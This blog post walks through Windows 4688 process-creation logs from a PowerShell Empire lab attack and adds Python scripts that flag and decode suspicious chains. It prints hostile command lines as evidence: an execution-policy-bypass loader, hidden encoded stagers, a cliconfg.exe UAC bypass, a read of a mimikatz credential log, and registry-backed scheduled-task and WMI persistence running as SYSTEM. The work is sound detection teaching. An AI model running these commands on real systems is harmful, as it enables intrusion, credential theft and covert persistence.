Wednesday, February 2, 2022

Beginning PowerShell Empire - Log Analysis

This post looks at the Windows logs generated by some of the activity from this series as it was being performed while I was learning PowerShell Empire. Every entry below is Security Event ID 4688 (A new process has been created) from a host with command-line logging enabled, which is why the Process Command Line field is populated. The %%1936, %%1937 and %%1938 values in Token Elevation Type are unresolved message IDs for elevation types 1 (default), 2 (full, elevated) and 3 (limited, the filtered token of a UAC-split administrator).

First up, when the file is executed from the browser, the Security Event Log shows chrome.exe creating cmd.exe with a command line that includes the welcome.bat file.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x700AD

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x10b8
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		Mandatory Label\Medium Mandatory Level
	Creator Process ID:	0x15a4
	Creator Process Name:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
	Process Command Line:	C:\WINDOWS\system32\cmd.exe /c ""C:\Users\sec560\Downloads\welcome.bat" "

...

We then see cmd.exe spawn powershell.exe, which reads the contents of welcome.bat with [IO.File]::ReadAllText and pipes them to iex (Invoke-Expression), so the batch file doubles as the PowerShell script. Note the -nop (no profile) and -ep bypass (execution policy bypass) switches on the command line.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x700AD

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xbd0
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		Mandatory Label\Medium Mandatory Level
	Creator Process ID:	0x10b8
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe"  -nol -nop -ep bypass "[IO.File]::ReadAllText('C:\Users\sec560\Downloads\welcome.bat')|iex" 
...

Next we see the contents of welcome.bat being executed: the PowerShell launched from cmd.exe starts a second powershell.exe with -noP -sta -w 1 -enc and a Base64 payload (UTF-16LE, as -EncodedCommand expects). This is the Empire stager; -w 1 sets the window style to hidden.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x700AD

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xe10
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		Mandatory Label\Medium Mandatory Level
	Creator Process ID:	0xbd0
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAFIAUwBpAG8ATgBUAGEAQgBsAEUALgBQAFMAVgBFAHIAcwBpAG8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGYAXQAuAEEAcwBTAEUAbQBCAGwAWQAuAEcARQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4A...AEUAcgArACQAVAApADsAJABJAHYAPQAkAEQAYQBUAGEAWwAwAC4ALgAzAF0AOwAkAEQAQQB0AEEAPQAkAGQAYQBUAGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUATgBHAHQAaABdADsALQBqAE8ASQBuAFsAQwBIAGEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
...

Now that access has been gained, let's see what other commands look like in the log when they are run against the system.

Surprisingly, when the whoami command was run from within the PowerShell Empire interactive environment, I did not see any entry in the log.

While nothing showed up when whoami was run within the interactive environment, once I dropped down to shell I was able to see an entry in the log. This matches what 4688 records: shell spawns cmd.exe /c (the Creator Process ID 0xe10 below is the agent's powershell.exe), which is a new process, whereas a command executed inside the agent's existing powershell.exe creates no new process and therefore no 4688 event.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x700AD

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x14d0
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		Mandatory Label\Medium Mandatory Level
	Creator Process ID:	0xe10
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\System32\cmd.exe" /c "whoami /groups"


For the activity that enumerates the local Administrators group, we see the following in the log.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x700AD

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x848
	New Process Name:	C:\Windows\System32\net1.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		Mandatory Label\Medium Mandatory Level
	Creator Process ID:	0xa88
	Creator Process Name:	C:\Windows\System32\net.exe
	Process Command Line:	C:\WINDOWS\system32\net1 localgroup administrators
...

Note, if you look closely, you will see it says net1.exe rather than net.exe. This is because net.exe hands the actual work to net1.exe, so the enumeration appears as a net1.exe process whose creator is net.exe (PID 0xa88); to attribute it back to the agent, look up net.exe's own 4688 event for its creator process.

For the UAC bypass, I saw the following entries in the log, which I believe are associated with the bypass.

First, I see consent.exe being executed. It runs as SYSTEM at System Mandatory Level out of svchost.exe with Token Elevation Type %%1936 (type 1). This is the UAC consent process, launched whenever something requests elevation, so on its own it is normal activity; what matters is what follows it.

A new process has been created.

Creator Subject:
	Security ID:		SYSTEM
	Account Name:		SEC560STUDENT$
	Account Domain:		SEC560
	Logon ID:		0x3E7

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x36c
	New Process Name:	C:\Windows\System32\consent.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\System Mandatory Level
	Creator Process ID:	0x148
	Creator Process Name:	C:\Windows\System32\svchost.exe
	Process Command Line:	consent.exe 328 318 00000277C25C97A0

...

This is then followed by debug.bat being run via cmd.exe. Note the creator, cliconfg.exe, a Microsoft auto-elevating binary, and the result: cmd.exe at High Mandatory Level with Token Elevation Type %%1937 (type 2, full token) under Logon ID 0x7007D, a different logon session from the 0x700AD used by the medium-integrity chain above. The elevated half of a split-token administrator's linked token pair has its own logon session, which is why the ID changes.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xf0c
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xb88
	Creator Process Name:	C:\Windows\System32\cliconfg.exe
	Process Command Line:	"C:\WINDOWS\system32\cmd.exe" /C "C:\Users\sec560\AppData\Local\Temp\debug.bat"

I also see that cmd.exe launch a High-integrity powershell.exe with the same -noP -sta -w 1 -enc stager launcher, now running with the full token.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1104
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xf0c
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	powershell  -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVgBFAFIAUwBJAG8AbgBUAEEAQgBsAGUALgBQAFMAVgBFAFIAUwBpAG8AbgAuAE0AQQBKAG8AcgAgAC0ARwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGYAXQAuAEEAcwBTAEUAbQBCAGwAWQAuAEcARQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4A...AFQAcABCAFIAawBPAC8AZwA9ACIAKQA7ACQAZABBAFQAQQA9ACQAQgA0ADgARQAuAEQAbwBXAG4AbABPAEEAZABEAGEAdABBACgAJABTAGUAUgArACQAdAApADsAJABJAHYAPQAkAEQAQQB0AEEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAEQAQQBUAGEAWwA0AC4ALgAkAEQAYQBUAGEALgBMAGUAbgBHAFQAaABdADsALQBqAE8AaQBuAFsAQwBoAEEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==

The above is then followed by the deletion of the debug.bat file.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x140c
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xf0c
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	cmd  /c del "C:\Users\sec560\AppData\Local\Temp\debug.bat"

Similar to the previous example, I noticed that consent.exe was invoked right before the following was seen in the log. Here the Creator Subject is SYSTEM while the Target Subject is sec560 (Logon ID 0x7007D), and the Creator Process is the original medium-integrity agent (PID 0xe10), yet the new powershell.exe runs at High Mandatory Level.

A new process has been created.

Creator Subject:
	Security ID:		SYSTEM
	Account Name:		SEC560STUDENT$
	Account Domain:		SEC560
	Logon ID:		0x3E7

Target Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Process Information:
	New Process ID:		0x1670
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xe10
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVgBFAHIAcwBpAG8ATgBUAEEAYgBsAEUALgBQAFMAVgBlAFIAcwBpAE8AbgAuAE0AYQBKAG8AcgAgAC0AZwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGYAXQAuAEEAcwBTAEUAbQBCAGwAWQAuAEcARQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4A...AVwBDADEAWQBuAGYAQQA4AFkAPQAiACkAOwAkAEQAYQBUAEEAPQAkAEIANAA4AEUALgBEAG8AVwBuAGwAbwBBAGQARABBAHQAQQAoACQAUwBlAFIAKwAkAFQAKQA7ACQAaQB2AD0AJABEAEEAdABBAFsAMAAuAC4AMwBdADsAJABkAGEAVABhAD0AJABEAGEAdABhAFsANAAuAC4AJABEAEEAdABBAC4AbABlAE4AZwB0AEgAXQA7AC0ASgBPAEkATgBbAEMAaABhAFIAWwBdAF0AKAAmACAAJABSACAAJABEAGEAdABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA= 

Something else I noticed is that they both ran whoami /groups before executing their commands. Maybe this is just a coincidence or some other artifact of the system. Who knows. Not enough time to dig into this at this point.
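Turning the observations so far into a repeatable check, the following is an added example and not code from the original post: a Python script that parses raw 4688 message text (as copied from Event Viewer or dumped with Get-WinEvent), rebuilds the creator-to-child chain by PID, and flags the patterns seen above: a browser spawning a shell, -ep bypass or iex on a PowerShell command line, an -enc payload (decoded as UTF-16LE), an auto-elevating binary such as cliconfg.exe starting a High-integrity process, and a Medium-to-High integrity jump between creator and child together with the change of Logon ID. The sample events are constructed, abridged copies of the entries quoted above, the encoded payload is only the prefix that is visible before the post's "...", and the BROWSERS, SHELLS and AUTO_ELEVATE name lists are illustrative assumptions rather than complete catalogues.

```python
import base64
import re

# Constructed sample, abridged to the fields the rules below read. PIDs, paths, labels and
# logon IDs mirror the post's 4688 events; the -enc payload is only the visible 208-char prefix.
ENC_PREFIX = ("SQBmACgAJABQAFMAVgBFAFIAUwBpAG8ATgBUAGEAQgBsAEUALgBQAFMAVgBFAHIAcwBpAG8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsA"
              "JABSAEUARgA9AFsAUgBFAGYAXQAuAEEAcwBTAEUAbQBCAGwAWQAuAEcARQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4A")
SAMPLE_4688 = rf"""A new process has been created.
    Logon ID:       0x700AD
    New Process ID:     0x10b8
    New Process Name:   C:\Windows\System32\cmd.exe
    Mandatory Label:    Mandatory Label\Medium Mandatory Level
    Creator Process ID: 0x15a4
    Creator Process Name:   C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    Process Command Line:   C:\WINDOWS\system32\cmd.exe /c ""C:\Users\sec560\Downloads\welcome.bat" "
A new process has been created.
    Logon ID:       0x700AD
    New Process ID:     0xbd0
    New Process Name:   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Mandatory Label:    Mandatory Label\Medium Mandatory Level
    Creator Process ID: 0x10b8
    Creator Process Name:   C:\Windows\System32\cmd.exe
    Process Command Line:   "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -nol -nop -ep bypass "[IO.File]::ReadAllText('C:\Users\sec560\Downloads\welcome.bat')|iex"
A new process has been created.
    Logon ID:       0x700AD
    New Process ID:     0xe10
    New Process Name:   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Mandatory Label:    Mandatory Label\Medium Mandatory Level
    Creator Process ID: 0xbd0
    Creator Process Name:   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Process Command Line:   "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc {ENC_PREFIX}
A new process has been created.
    Logon ID:       0x7007D
    New Process ID:     0xf0c
    New Process Name:   C:\Windows\System32\cmd.exe
    Mandatory Label:    Mandatory Label\High Mandatory Level
    Creator Process ID: 0xb88
    Creator Process Name:   C:\Windows\System32\cliconfg.exe
    Process Command Line:   "C:\WINDOWS\system32\cmd.exe" /C "C:\Users\sec560\AppData\Local\Temp\debug.bat"
A new process has been created.
    Logon ID:       0x7007D
    New Process ID:     0x1670
    New Process Name:   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Mandatory Label:    Mandatory Label\High Mandatory Level
    Creator Process ID: 0xe10
    Creator Process Name:   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Process Command Line:   "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc {ENC_PREFIX}"""

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
AUTO_ELEVATE = {"cliconfg.exe", "fodhelper.exe", "eventvwr.exe", "sdclt.exe"}  # assumed list of UAC-bypass favourites
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

def parse_4688(text):
    """One dict per message; 'Creator Subject' precedes 'Target Subject', so setdefault keeps the creator's values."""
    events = []
    for line in text.splitlines():
        if line.strip().startswith("A new process has been created"):
            events.append({})
            continue
        key, sep, value = line.strip().partition(":")
        if events and sep and value.strip():
            events[-1].setdefault(key.strip(), value.strip())
    return events

def decode_enc(cmdline):
    """Decode a -enc/-EncodedCommand payload (Base64 of UTF-16LE) or return None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def exe(path):  # 'C:\Windows\System32\cmd.exe' -> 'cmd.exe'
    return path.rsplit("\\", 1)[-1].lower()

def level(ev):  # 'Mandatory Label\Medium Mandatory Level' -> 'Medium'
    return ev.get("Mandatory Label", "").rsplit("\\", 1)[-1].split(" ")[0]

def analyse(events):
    """Walk creator -> child by PID and return (new PID, finding) pairs."""
    by_pid = {ev["New Process ID"].lower(): ev for ev in events}
    findings = []
    for ev in events:
        pid, cmd = ev["New Process ID"], ev.get("Process Command Line", "")
        child, parent = exe(ev["New Process Name"]), exe(ev.get("Creator Process Name", ""))
        creator = by_pid.get(ev.get("Creator Process ID", "").lower())  # None if outside the window
        if parent in BROWSERS and child in SHELLS:
            findings.append((pid, f"{parent} spawned {child}: {cmd}"))
        if child in ("powershell.exe", "pwsh.exe"):
            if re.search(r"-(?:ep|executionpolicy)\s+bypass|\biex\b", cmd, re.I):
                findings.append((pid, "execution-policy bypass / iex on the command line"))
            if (decoded := decode_enc(cmd)) is not None:
                findings.append((pid, f"-enc decodes to: {decoded[:48]}"))
        if parent in AUTO_ELEVATE and level(ev) == "High":
            findings.append((pid, f"auto-elevating {parent} started High-integrity {child}"))
        if creator is not None and level(creator) == "Medium" and level(ev) == "High":
            findings.append((pid, f"Medium->High jump; logon {creator['Logon ID']} -> {ev['Logon ID']}"))
    return findings
```

Run it with `for pid, f in analyse(parse_4688(SAMPLE_4688)): print(pid, f)`; on the sample it reports the chrome.exe to cmd.exe launch, the -ep bypass / iex loader, the decoded stager prefix, cliconfg.exe starting a High-integrity cmd.exe, and the Medium-to-High jump from PID 0xe10 to 0x1670 with the logon change 0x700AD to 0x7007D. Two caveats for real data: PIDs are reused, so key the creator lookup by PID plus creation time (or use Sysmon Event ID 1's ProcessGuid) rather than PID alone, and Process Command Line is only present when the "Include command line in process creation events" policy is enabled, as it evidently was on this lab host.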

Below shows what is seen when the mimilsa.log file is read. mimilsa.log in System32 is where mimikatz's memssp credential-logging SSP writes the passwords it captures, so a type of that file is the attacker collecting credentials.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xd6c
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1104
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\System32\cmd.exe" /c "type c:\windows\system32\mimilsa.log"

When the command was run to perform a packet capture, we see the following in the log.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1030
	New Process Name:	C:\Windows\System32\netsh.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1104
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\System32\netsh.exe" trace start capture=yes traceFile=c:\tmp\capture.etl maxSize=1MB

It looks like when netsh.exe starts a trace it also runs dispdiag.exe, which writes a file named dispdiag_start.dat. netsh trace start collects system diagnostics alongside the capture, so dispdiag.exe as a child of netsh.exe is expected; the unusual part is netsh.exe itself being started by powershell.exe at High integrity.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x754
	New Process Name:	C:\Windows\System32\dispdiag.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1030
	Creator Process Name:	C:\Windows\System32\netsh.exe
	Process Command Line:	C:\WINDOWS\system32\dispdiag.exe -out dispdiag_start.dat

...

Looking at the scheduled task being created. Nothing is written to disk for the payload: the task action reads it from the registry value HKLM\Software\Microsoft\Network\debug, Base64-decodes it as UTF-16 ([Text.Encoding]::UNICODE) and hands it to IEX, running hidden (-W hidden) as SYSTEM (/RU system) at every logon (/SC ONLOGON).

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1570
	New Process Name:	C:\Windows\System32\schtasks.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1104
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\System32\schtasks.exe" /Create /F /RU system /SC ONLOGON /TN SecurityNik-Empire-Schtask /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKLM:\Software\Microsoft\Network debug).debug)))\""

Looking in the registry, we see the stored payload the task reads:

C:\WINDOWS\system32>reg query HKLM\Software\Microsoft\Network /v debug

HKEY_LOCAL_MACHINE\Software\Microsoft\Network
    debug    REG_SZ    SQBmACgAJABQAFMAVgBFAFIAUwBJAE8AbgBUAGEAQgBMAGUALgBQAFMAVgBFAHIAcwBpAE8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGY
...
JAFYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAQQBUAEEAPQAkAGQAYQB0AEEAWwA0AC4ALgAkAEQAYQB0AEEALgBsAGUATgBnAFQASABdADsALQBqAG8ASQBuAFsAQwBIAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAQQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==

Confirming the scheduled task was created.

C:\>schtasks /query /TN SecurityNik-Empire-Schtask   
Folder: \    
TaskName                                 Next Run Time          Status  
======================================== ====================== ===============
SecurityNik-Empire-Schtask               N/A                    Ready          

Looking at the registry after the registry persistence was added.

C:\WINDOWS\system32>reg query HKLM\software\Microsoft\Windows\CurrentVersion /v debug

HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion
    debug    REG_SZ    SQBGACgAJABQAFMAVgBFAFIAUwBJAE8AbgBUAEEAYgBsAEUALgBQAFMAVgBFAFIAUwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwAp...QQB0AEEAWwAwAC4ALgAzAF0AOwAkAEQAYQB0AEEAPQAkAGQAYQB0AEEAWwA0AC4ALgAkAEQAYQBUAEEALgBsAEUAbgBHAFQAaABdADsALQBqAE8AaQBOAFsAQwBoAEEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQBUAEEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==

For the WMI persistence, autorunsc.exe from Sysinternals shows the following. The Updater consumer's command reads its payload from the same HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Debug value shown above and runs it with -enc, so once again the registry value, not the autostart entry, is where the stager actually lives.

C:\Tools\SysinternalsSuite>autorunsc.exe  -nobanner  *  | more

   Updater  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x"  File not found: $x=$((gp HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Wrin Hidden -enc $x      
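Both persistence mechanisms above keep the stager in the registry and put only a loader in the autostart entry, so triage means following that indirection. As an added example, not code from the original post: a Python script that pulls the (gp HKLM:... name) references out of an autostart action, the way the schtasks /TR and the WMI Updater command above are written, looks the referenced values up and decodes them as UTF-16LE Base64. The action strings are copied from the post with the schtasks quoting removed; the registry contents are stand-ins encoded from harmless one-liners, because the post's stored strings are truncated with "...".

```python
import base64
import re

# Constructed sample. The two autostart actions are the schtasks /TR and the WMI 'Updater'
# command quoted in the post (schtasks' \" escaping removed); the registry data are stand-ins
# encoded from harmless one-liners, since the post's stored strings are truncated with "...".
def to_enc(script):
    """Encode a script the way -EncodedCommand expects: Base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

REGISTRY = {  # (key, value name) -> data, as 'reg query <key> /v <name>' would show it
    (r"HKLM\Software\Microsoft\Network", "debug"): to_enc("Write-Host 'stand-in stager 1'"),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion", "Debug"): to_enc("Write-Host 'stand-in stager 2'"),
}
ACTIONS = {
    "SecurityNik-Empire-Schtask": r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden '
        r'-c "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKLM:\Software\Microsoft\Network debug).debug)))"',
    "Updater (WMI)": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x"',
}
# Matches '(gp HKLM:\Some\Key ValueName)' with or without the backslash after the hive.
GP_RE = re.compile(r"\(gp\s+(HK[A-Z]+):\\?([^\s)]+)\s+([^\s)]+)\)", re.I)

def registry_refs(action):
    """Return (key, value name) pairs an autostart action reads via Get-ItemProperty (gp)."""
    return [(f"{hive.upper()}\\{path}", name) for hive, path, name in GP_RE.findall(action)]

def resolve(action, registry):
    """Follow each registry reference and decode the stored data as a UTF-16LE Base64 payload.
    Returns (key, value name, decoded script or None) per reference; lookups are case-insensitive."""
    lowered = {(k.lower(), n.lower()): data for (k, n), data in registry.items()}
    out = []
    for key, name in registry_refs(action):
        data = lowered.get((key.lower(), name.lower()))
        try:
            script = base64.b64decode(data, validate=True).decode("utf-16-le") if data else None
        except (ValueError, UnicodeDecodeError):
            script = None
        out.append((key, name, script))
    return out

def triage(actions, registry):
    """Resolve every autostart action; returns {name: [(key, value name, script), ...]}."""
    return {name: resolve(action, registry) for name, action in actions.items()}

if __name__ == "__main__":
    for name, refs in triage(ACTIONS, REGISTRY).items():
        for key, value, script in refs:
            print(f"{name}: {key}\\{value} -> {script!r}")
```

On a live host the REGISTRY dict would be filled from reg query or Get-ItemProperty output and the actions from schtasks /query /XML, the Run keys and Get-CimInstance -Namespace root\subscription -ClassName CommandLineEventConsumer. The decoded registry value, rather than the autostart entry itself, is the artifact worth keeping as evidence.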

There is so much more we could see from the logs; this was just a sneak peek.

That's it for this post. See you in the next post, where we look at things from the packets perspective.

Other posts in this series:

Beginning Powershell Empire - The Attack in 10 steps
Powershell Empire Log Analysis
Powershell Empire Packet Analysis
Powershell Empire Detection with Snort
Powershell Empire - Detection with Zeek
